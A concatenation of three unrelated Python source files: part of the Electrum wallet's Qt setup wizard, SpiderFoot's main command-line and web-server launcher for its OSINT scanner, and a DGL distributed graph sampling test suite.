line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
sf.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: sf
# Purpose: Main wrapper for calling all SpiderFoot modules
#
# Author: Steve Micallef <steve@binarypool.com>
#
# Created: 03/04/2012
# Copyright: (c) Steve Micallef 2012
# Licence: MIT
# -------------------------------------------------------------------------------
import argparse
import logging
import multiprocessing as mp
import os
import os.path
import random
import signal
import sys
import time
from copy import deepcopy
import cherrypy
import cherrypy_cors
from cherrypy.lib import auth_digest
from sflib import SpiderFoot
from sfscan import startSpiderFootScanner
from sfwebui import SpiderFootWebUi
from spiderfoot import SpiderFootHelpers
from spiderfoot import SpiderFootDb
from spiderfoot import SpiderFootCorrelator
from spiderfoot.logger import logListenerSetup, logWorkerSetup
from spiderfoot import __version__
scanId = None
dbh = None
def main() -> None:
# web server config
sfWebUiConfig = {
'host': '127.0.0.1',
'port': 5001,
'root': '/',
'cors_origins': [],
}
# 'Global' configuration options
# These can be overridden on a per-module basis, and some will
# be overridden from saved configuration settings stored in the DB.
sfConfig = {
'_debug': False, # Debug
'_maxthreads': 3, # Number of modules to run concurrently
'__logging': True, # Logging in general
'__outputfilter': None, # Event types to filter from modules' output
'_useragent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0', # User-Agent to use for HTTP requests
'_dnsserver': '', # Override the default resolver
'_fetchtimeout': 5, # number of seconds before giving up on a fetch
'_internettlds': 'https://publicsuffix.org/list/effective_tld_names.dat',
'_internettlds_cache': 72,
'_genericusers': "abuse,admin,billing,compliance,devnull,dns,ftp,hostmaster,inoc,ispfeedback,ispsupport,list-request,list,maildaemon,marketing,noc,no-reply,noreply,null,peering,peering-notify,peering-request,phish,phishing,postmaster,privacy,registrar,registry,root,routing-registry,rr,sales,security,spam,support,sysadmin,tech,undisclosed-recipients,unsubscribe,usenet,uucp,webmaster,www",
'__database': f"{SpiderFootHelpers.dataPath()}/spiderfoot.db",
'__modules__': None, # List of modules. Will be set after start-up.
'__correlationrules__': None, # List of correlation rules. Will be set after start-up.
'_socks1type': '',
'_socks2addr': '',
'_socks3port': '',
'_socks4user': '',
'_socks5pwd': '',
}
sfOptdescs = {
'_debug': "Enable debugging?",
'_maxthreads': "Max number of modules to run concurrently",
'_useragent': "User-Agent string to use for HTTP requests. Prefix with an '@' to randomly select the User Agent from a file containing user agent strings for each request, e.g. @C:\\useragents.txt or @/home/bob/useragents.txt. Or supply a URL to load the list from there.",
'_dnsserver': "Override the default resolver with another DNS server. For example, 8.8.8.8 is Google's open DNS server.",
'_fetchtimeout': "Number of seconds before giving up on a HTTP request.",
'_internettlds': "List of Internet TLDs.",
'_internettlds_cache': "Hours to cache the Internet TLD list. This can safely be quite a long time given that the list doesn't change too often.",
'_genericusers': "List of usernames that if found as usernames or as part of e-mail addresses, should be treated differently to non-generics.",
'_socks1type': "SOCKS Server Type. Can be '4', '5', 'HTTP' or 'TOR'",
'_socks2addr': 'SOCKS Server IP Address.',
'_socks3port': 'SOCKS Server TCP Port. Usually 1080 for 4/5, 8080 for HTTP and 9050 for TOR.',
'_socks4user': 'SOCKS Username. Valid only for SOCKS4 and SOCKS5 servers.',
'_socks5pwd': "SOCKS Password. Valid only for SOCKS5 servers.",
'_modulesenabled': "Modules enabled for the scan." # This is a hack to get a description for an option not actually available.
}
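# For example (hypothetical values), routing scan traffic through a local TOR proxy
# would use: _socks1type='TOR', _socks2addr='127.0.0.1', _socks3port='9050'.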
# Legacy way to run the server
args = None
p = argparse.ArgumentParser(description=f"SpiderFoot {__version__}: Open Source Intelligence Automation.")
p.add_argument("-d", "--debug", action='store_true', help="Enable debug output.")
p.add_argument("-l", metavar="IP:port", help="IP and port to listen on.")
p.add_argument("-m", metavar="mod1,mod2,...", type=str, help="Modules to enable.")
p.add_argument("-M", "--modules", action='store_true', help="List available modules.")
p.add_argument("-C", "--correlate", metavar="scanID", help="Run correlation rules against a scan ID.")
p.add_argument("-s", metavar="TARGET", help="Target for the scan.")
p.add_argument("-t", metavar="type1,type2,...", type=str, help="Event types to collect (modules selected automatically).")
p.add_argument("-u", choices=["all", "footprint", "investigate", "passive"], type=str, help="Select modules automatically by use case")
p.add_argument("-T", "--types", action='store_true', help="List available event types.")
p.add_argument("-o", choices=["tab", "csv", "json"], type=str, help="Output format. Tab is default.")
p.add_argument("-H", action='store_true', help="Don't print field headers, just data.")
p.add_argument("-n", action='store_true', help="Strip newlines from data.")
p.add_argument("-r", action='store_true', help="Include the source data field in tab/csv output.")
p.add_argument("-S", metavar="LENGTH", type=int, help="Maximum data length to display. By default, all data is shown.")
p.add_argument("-D", metavar='DELIMITER', type=str, help="Delimiter to use for CSV output. Default is ,.")
p.add_argument("-f", action='store_true', help="Filter out other event types that weren't requested with -t.")
p.add_argument("-F", metavar="type1,type2,...", type=str, help="Show only a set of event types, comma-separated.")
p.add_argument("-x", action='store_true', help="STRICT MODE. Will only enable modules that can directly consume your target, and if -t was specified only those events will be consumed by modules. This overrides -t and -m options.")
p.add_argument("-q", action='store_true', help="Disable logging. This will also hide errors!")
p.add_argument("-V", "--version", action='store_true', help="Display the version of SpiderFoot and exit.")
p.add_argument("-max-threads", type=int, help="Max number of modules to run concurrently.")
args = p.parse_args()
if args.version:
print(f"SpiderFoot {__version__}: Open Source Intelligence Automation.")
sys.exit(0)
if args.max_threads:
sfConfig['_maxthreads'] = args.max_threads
if args.debug:
sfConfig['_debug'] = True
else:
sfConfig['_debug'] = False
if args.q:
sfConfig['__logging'] = False
loggingQueue = mp.Queue()
logListenerSetup(loggingQueue, sfConfig)
logWorkerSetup(loggingQueue)
log = logging.getLogger(f"spiderfoot.{__name__}")
sft = SpiderFoot(sfConfig)
# Add descriptions of the global config options
sfConfig['__globaloptdescs__'] = sfOptdescs
# Load each module in the modules directory with a .py extension
try:
mod_dir = sft.myPath() + '/modules/'
sfModules = SpiderFootHelpers.loadModulesAsDict(mod_dir)
except BaseException as e:
log.critical(f"Failed to load modules: {e}", exc_info=True)
sys.exit(-1)
if not sfModules:
log.critical(f"No modules found in modules directory: {mod_dir}")
sys.exit(-1)
# Load each correlation rule in the correlations directory with
# a .yaml extension
try:
correlations_dir = sft.myPath() + '/correlations/'
correlationRulesRaw = SpiderFootHelpers.loadCorrelationRulesRaw(correlations_dir)
except BaseException as e:
log.critical(f"Failed to load correlation rules: {e}", exc_info=True)
sys.exit(-1)
# Initialize database handle
try:
dbh = SpiderFootDb(sfConfig)
except Exception as e:
log.critical(f"Failed to initialize database: {e}", exc_info=True)
sys.exit(-1)
# Sanity-check the rules and parse them
sfCorrelationRules = list()
if not correlationRulesRaw:
log.error(f"No correlation rules found in correlations directory: {correlations_dir}")
else:
try:
correlator = SpiderFootCorrelator(dbh, correlationRulesRaw)
sfCorrelationRules = correlator.get_ruleset()
except Exception as e:
log.critical(f"Failure initializing correlation rules: {e}", exc_info=True)
sys.exit(-1)
# Add modules and correlation rules to sfConfig so they can be used elsewhere
sfConfig['__modules__'] = sfModules
sfConfig['__correlationrules__'] = sfCorrelationRules
if args.correlate:
if not correlationRulesRaw:
log.error("Unable to perform correlations as no correlation rules were found.")
sys.exit(-1)
try:
log.info(f"Running {len(correlationRulesRaw)} correlation rules against scan, {args.correlate}.")
corr = SpiderFootCorrelator(dbh, correlationRulesRaw, args.correlate)
corr.run_correlations()
except Exception as e:
log.critical(f"Unable to run correlation rules: {e}", exc_info=True)
sys.exit(-1)
sys.exit(0)
if args.modules:
log.info("Modules available:")
for m in sorted(sfModules.keys()):
if "__" in m:
continue
print(('{0:25} {1}'.format(m, sfModules[m]['descr'])))
sys.exit(0)
if args.types:
dbh = SpiderFootDb(sfConfig, init=True)
log.info("Types available:")
typedata = dbh.eventTypes()
types = dict()
for r in typedata:
types[r[1]] = r[0]
for t in sorted(types.keys()):
print(('{0:45} {1}'.format(t, types[t])))
sys.exit(0)
if args.l:
try:
(host, port) = args.l.split(":")
except BaseException:
log.critical("Invalid ip:port format.")
sys.exit(-1)
sfWebUiConfig['host'] = host
sfWebUiConfig['port'] = port
start_web_server(sfWebUiConfig, sfConfig, loggingQueue)
sys.exit(0)
start_scan(sfConfig, sfModules, args, loggingQueue)
def start_scan(sfConfig: dict, sfModules: dict, args, loggingQueue) -> None:
"""Start scan
Args:
sfConfig (dict): SpiderFoot config options
sfModules (dict): modules
args (argparse.Namespace): command line args
loggingQueue (Queue): main SpiderFoot logging queue
"""
log = logging.getLogger(f"spiderfoot.{__name__}")
global dbh
global scanId
dbh = SpiderFootDb(sfConfig, init=True)
sf = SpiderFoot(sfConfig)
if not args.s:
log.error("You must specify a target when running in scan mode. Try --help for guidance.")
sys.exit(-1)
if args.x and not args.t:
log.error("-x can only be used with -t. Use --help for guidance.")
sys.exit(-1)
if args.x and args.m:
log.error("-x can only be used with -t and not with -m. Use --help for guidance.")
sys.exit(-1)
if args.r and (args.o and args.o not in ["tab", "csv"]):
log.error("-r can only be used when your output format is tab or csv.")
sys.exit(-1)
if args.H and (args.o and args.o not in ["tab", "csv"]):
log.error("-H can only be used when your output format is tab or csv.")
sys.exit(-1)
if args.D and args.o != "csv":
log.error("-D can only be used when using the csv output format.")
sys.exit(-1)
target = args.s
# Usernames and names - quoted on the commandline - won't have quotes,
# so add them.
if " " in target:
target = f"\"{target}\""
if "." not in target and not target.startswith("+") and '"' not in target:
target = f"\"{target}\""
targetType = SpiderFootHelpers.targetTypeFromString(target)
if not targetType:
log.error(f"Could not determine target type. Invalid target: {target}")
sys.exit(-1)
target = target.strip('"')
modlist = list()
if not args.t and not args.m and not args.u:
log.warning("You didn't specify any modules, types or use case, so all modules will be enabled.")
for m in list(sfModules.keys()):
if "__" in m:
continue
modlist.append(m)
signal.signal(signal.SIGINT, handle_abort)
# If the user is scanning by type..
# 1. Find modules producing that type
if args.t:
types = args.t
modlist = sf.modulesProducing(types)
newmods = deepcopy(modlist)
newmodcpy = deepcopy(newmods)
# 2. For each type those modules consume, get modules producing
while len(newmodcpy) > 0:
for etype in sf.eventsToModules(newmodcpy):
xmods = sf.modulesProducing([etype])
for mod in xmods:
if mod not in modlist:
modlist.append(mod)
newmods.append(mod)
newmodcpy = deepcopy(newmods)
newmods = list()
# Easier if scanning by module
if args.m:
modlist = list(filter(None, args.m.split(",")))
# Select modules if the user selected a use case
if args.u:
usecase = args.u[0].upper() + args.u[1:] # Make the first letter uppercase
for mod in sfConfig['__modules__']:
if usecase == 'All' or usecase in sfConfig['__modules__'][mod]['group']:
modlist.append(mod)
# Add sfp__stor_stdout to the module list
typedata = dbh.eventTypes()
types = dict()
for r in typedata:
types[r[1]] = r[0]
sfp__stor_stdout_opts = sfConfig['__modules__']['sfp__stor_stdout']['opts']
sfp__stor_stdout_opts['_eventtypes'] = types
if args.f:
if args.f and not args.t:
log.error("You can only use -f with -t. Use --help for guidance.")
sys.exit(-1)
sfp__stor_stdout_opts['_showonlyrequested'] = True
if args.F:
sfp__stor_stdout_opts['_requested'] = args.F.split(",")
sfp__stor_stdout_opts['_showonlyrequested'] = True
if args.o:
if args.o not in ["tab", "csv", "json"]:
log.error("Invalid output format selected. Must be 'tab', 'csv' or 'json'.")
sys.exit(-1)
sfp__stor_stdout_opts['_format'] = args.o
if args.t:
sfp__stor_stdout_opts['_requested'] = args.t.split(",")
if args.n:
sfp__stor_stdout_opts['_stripnewline'] = True
if args.r:
sfp__stor_stdout_opts['_showsource'] = True
if args.S:
sfp__stor_stdout_opts['_maxlength'] = args.S
if args.D:
sfp__stor_stdout_opts['_csvdelim'] = args.D
if args.x:
tmodlist = list()
modlist = list()
xmods = sf.modulesConsuming([targetType])
for mod in xmods:
if mod not in modlist:
tmodlist.append(mod)
# Remove any modules not producing the type requested
rtypes = args.t.split(",")
for mod in tmodlist:
for r in rtypes:
if not sfModules[mod]['provides']:
continue
if r in sfModules[mod].get('provides', []) and mod not in modlist:
modlist.append(mod)
if len(modlist) == 0:
log.error("Based on your criteria, no modules were enabled.")
sys.exit(-1)
modlist += ["sfp__stor_db", "sfp__stor_stdout"]
if sfConfig['__logging']:
log.info(f"Modules enabled ({len(modlist)}): {','.join(modlist)}")
cfg = sf.configUnserialize(dbh.configGet(), sfConfig)
# Debug mode is a variable that gets stored to the DB, so re-apply it
if args.debug:
cfg['_debug'] = True
else:
cfg['_debug'] = False
# If strict mode is enabled, filter the output from modules.
if args.x and args.t:
cfg['__outputfilter'] = args.t.split(",")
# Prepare scan output headers
if args.o == "json":
print("[", end='')
elif not args.H:
delim = "\t"
if args.o == "tab":
delim = "\t"
if args.o == "csv":
if args.D:
delim = args.D
else:
delim = ","
if args.r:
if delim == "\t":
headers = '{0:30}{1}{2:45}{3}{4}{5}{6}'.format("Source", delim, "Type", delim, "Source Data", delim, "Data")
else:
headers = delim.join(["Source", "Type", "Source Data", "Data"])
else:
if delim == "\t":
headers = '{0:30}{1}{2:45}{3}{4}'.format("Source", delim, "Type", delim, "Data")
else:
headers = delim.join(["Source", "Type", "Data"])
print(headers)
# Start running a new scan
scanName = target
scanId = SpiderFootHelpers.genScanInstanceId()
try:
p = mp.Process(target=startSpiderFootScanner, args=(loggingQueue, scanName, scanId, target, targetType, modlist, cfg))
p.daemon = True
p.start()
except BaseException as e:
log.error(f"Scan [{scanId}] failed: {e}")
sys.exit(-1)
# Poll for scan status until completion
while True:
time.sleep(1)
info = dbh.scanInstanceGet(scanId)
if not info:
continue
if info[5] in ["ERROR-FAILED", "ABORT-REQUESTED", "ABORTED", "FINISHED"]:
if sfConfig['__logging']:
log.info(f"Scan completed with status {info[5]}")
if args.o == "json":
print("]")
sys.exit(0)
return
def start_web_server(sfWebUiConfig: dict, sfConfig: dict, loggingQueue=None) -> None:
"""Start the web server so you can start looking at results
Args:
sfWebUiConfig (dict): web server options
sfConfig (dict): SpiderFoot config options
loggingQueue (Queue): main SpiderFoot logging queue
"""
log = logging.getLogger(f"spiderfoot.{__name__}")
web_host = sfWebUiConfig.get('host', '127.0.0.1')
web_port = sfWebUiConfig.get('port', 5001)
web_root = sfWebUiConfig.get('root', '/')
cors_origins = sfWebUiConfig.get('cors_origins', [])
cherrypy.config.update({
'log.screen': False,
'server.socket_host': web_host,
'server.socket_port': int(web_port)
})
log.info(f"Starting web server at {web_host}:{web_port} ...")
sf = SpiderFoot(sfConfig)
# Enable access to static files via the web directory
conf = {
'/query': {
'tools.encode.text_only': False,
'tools.encode.add_charset': True,
},
'/static': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'static',
'tools.staticdir.root': f"{sf.myPath()}/spiderfoot"
}
}
secrets = dict()
passwd_file = SpiderFootHelpers.dataPath() + '/passwd'
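# The optional passwd file is expected to hold one "username:password" entry
# per line; the values below are purely illustrative:
#   admin:changeme
#   analyst:s3cret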
if os.path.isfile(passwd_file):
if not os.access(passwd_file, os.R_OK):
log.error("Could not read passwd file. Permission denied.")
sys.exit(-1)
with open(passwd_file, 'r') as f:
passwd_data = f.readlines()
for line in passwd_data:
if line.strip() == '':
continue
if ':' not in line:
log.error("Incorrect format of passwd file, must be username:password on each line.")
sys.exit(-1)
u = line.strip().split(":")[0]
p = ':'.join(line.strip().split(":")[1:])
if not u or not p:
log.error("Incorrect format of passwd file, must be username:password on each line.")
sys.exit(-1)
secrets[u] = p
if secrets:
log.info("Enabling authentication based on supplied passwd file.")
conf['/'] = {
'tools.auth_digest.on': True,
'tools.auth_digest.realm': web_host,
'tools.auth_digest.get_ha1': auth_digest.get_ha1_dict_plain(secrets),
'tools.auth_digest.key': random.SystemRandom().randint(0, 99999999)
}
else:
warn_msg = "\n********************************************************************\n"
warn_msg += "Warning: passwd file contains no passwords. Authentication disabled.\n"
warn_msg += "Please consider adding authentication to protect this instance!\n"
warn_msg += "Refer to https://www.spiderfoot.net/documentation/#security.\n"
warn_msg += "********************************************************************\n"
log.warning(warn_msg)
using_ssl = False
key_path = SpiderFootHelpers.dataPath() + '/spiderfoot.key'
crt_path = SpiderFootHelpers.dataPath() + '/spiderfoot.crt'
if os.path.isfile(key_path) and os.path.isfile(crt_path):
if not os.access(crt_path, os.R_OK):
log.critical(f"Could not read {crt_path} file. Permission denied.")
sys.exit(-1)
if not os.access(key_path, os.R_OK):
log.critical(f"Could not read {key_path} file. Permission denied.")
sys.exit(-1)
log.info("Enabling SSL based on supplied key and certificate file.")
cherrypy.server.ssl_module = 'builtin'
cherrypy.server.ssl_certificate = crt_path
cherrypy.server.ssl_private_key = key_path
using_ssl = True
if using_ssl:
url = "https://"
else:
url = "http://"
if web_host == "0.0.0.0": # nosec
url = f"{url}127.0.0.1:{web_port}"
else:
url = f"{url}{web_host}:{web_port}{web_root}"
cors_origins.append(url)
cherrypy_cors.install()
cherrypy.config.update({
'cors.expose.on': True,
'cors.expose.origins': cors_origins,
'cors.preflight.origins': cors_origins
})
print("")
print("*************************************************************")
print(" Use SpiderFoot by starting your web browser of choice and ")
print(f" browse to {url}")
print("*************************************************************")
print("")
# Disable auto-reloading of content
cherrypy.engine.autoreload.unsubscribe()
cherrypy.quickstart(SpiderFootWebUi(sfWebUiConfig, sfConfig, loggingQueue), script_name=web_root, config=conf)
def handle_abort(signal, frame) -> None:
"""Handle interrupt and abort scan.
Args:
signal: signal number received (e.g. signal.SIGINT)
frame: current stack frame when the signal was received
"""
log = logging.getLogger(f"spiderfoot.{__name__}")
global dbh
global scanId
if scanId and dbh:
log.info(f"Aborting scan [{scanId}] ...")
dbh.scanInstanceSet(scanId, None, None, "ABORTED")
sys.exit(-1)
if __name__ == '__main__':
if sys.version_info < (3, 7):
print("SpiderFoot requires Python 3.7 or higher.")
sys.exit(-1)
if len(sys.argv) <= 1:
print("SpiderFoot requires -l <ip>:<port> to start the web server. Try --help for guidance.")
sys.exit(-1)
# TODO: remove this after a few releases (added in 3.5 pre-release 2021-09-05)
from pathlib import Path
if os.path.exists('spiderfoot.db'):
print(f"ERROR: spiderfoot.db file exists in {os.path.dirname(__file__)}")
print("SpiderFoot no longer supports loading the spiderfoot.db database from the application directory.")
print(f"The database is now loaded from your home directory: {Path.home()}/.spiderfoot/spiderfoot.db")
print(f"This message will go away once you move or remove spiderfoot.db from {os.path.dirname(__file__)}")
sys.exit(-1)
# TODO: remove this after a few releases (added in 3.5 pre-release 2021-09-05)
if os.path.exists('passwd'):
print(f"ERROR: passwd file exists in {os.path.dirname(__file__)}")
print("SpiderFoot no longer supports loading credentials from the application directory.")
print(f"The passwd file is now loaded from your home directory: {Path.home()}/.spiderfoot/passwd")
print(f"This message will go away once you move or remove passwd from {os.path.dirname(__file__)}")
sys.exit(-1)
main()
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.data import WN18Dataset
from dgl.distributed import sample_neighbors, sample_etype_neighbors
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
import pytest
from scipy import sparse as spsp
import random
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name, graph_format=['csc', 'coo']):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem,
graph_format=graph_format)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
try:
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def start_find_edges_client(rank, tmpdir, disable_shared_mem, eids, etype=None):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_find_edges.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_find_edges", gpb=gpb)
try:
u, v = dist_graph.find_edges(eids, etype=etype)
except Exception as e:
print(e)
u, v = None, None
dgl.distributed.exit_client()
return u, v
def start_get_degrees_client(rank, tmpdir, disable_shared_mem, nids=None):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_get_degrees.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_get_degrees", gpb=gpb)
try:
in_deg = dist_graph.in_degrees(nids)
all_in_deg = dist_graph.in_degrees()
out_deg = dist_graph.out_degrees(nids)
all_out_deg = dist_graph.out_degrees()
except Exception as e:
print(e)
in_deg, out_deg, all_in_deg, all_out_deg = None, None, None, None
dgl.distributed.exit_client()
return in_deg, out_deg, all_in_deg, all_out_deg
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
def check_rpc_find_edges_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
orig_nid, orig_eid = partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1,
'test_find_edges', ['csr', 'coo']))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
eids = F.tensor(np.random.randint(g.number_of_edges(), size=100))
u, v = g.find_edges(orig_eid[eids])
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids)
du = orig_nid[du]
dv = orig_nid[dv]
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
def create_random_hetero(dense=False, empty=False):
num_nodes = {'n1': 210, 'n2': 200, 'n3': 220} if dense else \
{'n1': 1010, 'n2': 1000, 'n3': 1020}
etypes = [('n1', 'r1', 'n2'),
('n1', 'r2', 'n3'),
('n2', 'r3', 'n3')]
edges = {}
random.seed(42)
for etype in etypes:
src_ntype, _, dst_ntype = etype
arr = spsp.random(num_nodes[src_ntype] - 10 if empty else num_nodes[src_ntype],
num_nodes[dst_ntype] - 10 if empty else num_nodes[dst_ntype],
density=0.1 if dense else 0.001,
format='coo', random_state=100)
edges[etype] = (arr.row, arr.col)
g = dgl.heterograph(edges, num_nodes)
g.nodes['n1'].data['feat'] = F.ones((g.number_of_nodes('n1'), 10), F.float32, F.cpu())
return g
def check_rpc_hetero_find_edges_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero()
num_parts = num_server
orig_nid, orig_eid = partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1,
'test_find_edges', ['csr', 'coo']))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
eids = F.tensor(np.random.randint(g.number_of_edges('r1'), size=100))
u, v = g.find_edges(orig_eid['r1'][eids], etype='r1')
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids, etype='r1')
du = orig_nid['n1'][du]
dv = orig_nid['n2'][dv]
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
# Wait for non-shared-memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_find_edges_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), num_server)
check_rpc_find_edges_shuffle(Path(tmpdirname), num_server)
def check_rpc_get_degree_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_get_degrees', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_get_degrees'))
p.start()
time.sleep(1)
pserver_list.append(p)
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_get_degrees.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
time.sleep(3)
nids = F.tensor(np.random.randint(g.number_of_nodes(), size=100))
in_degs, out_degs, all_in_degs, all_out_degs = start_get_degrees_client(0, tmpdir, num_server > 1, nids)
print("Done get_degree")
for p in pserver_list:
p.join()
print('check results')
assert F.array_equal(g.in_degrees(orig_nid[nids]), in_degs)
assert F.array_equal(g.in_degrees(orig_nid), all_in_degs)
assert F.array_equal(g.out_degrees(orig_nid[nids]), out_degs)
assert F.array_equal(g.out_degrees(orig_nid), all_out_degs)
# Wait for non-shared-memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
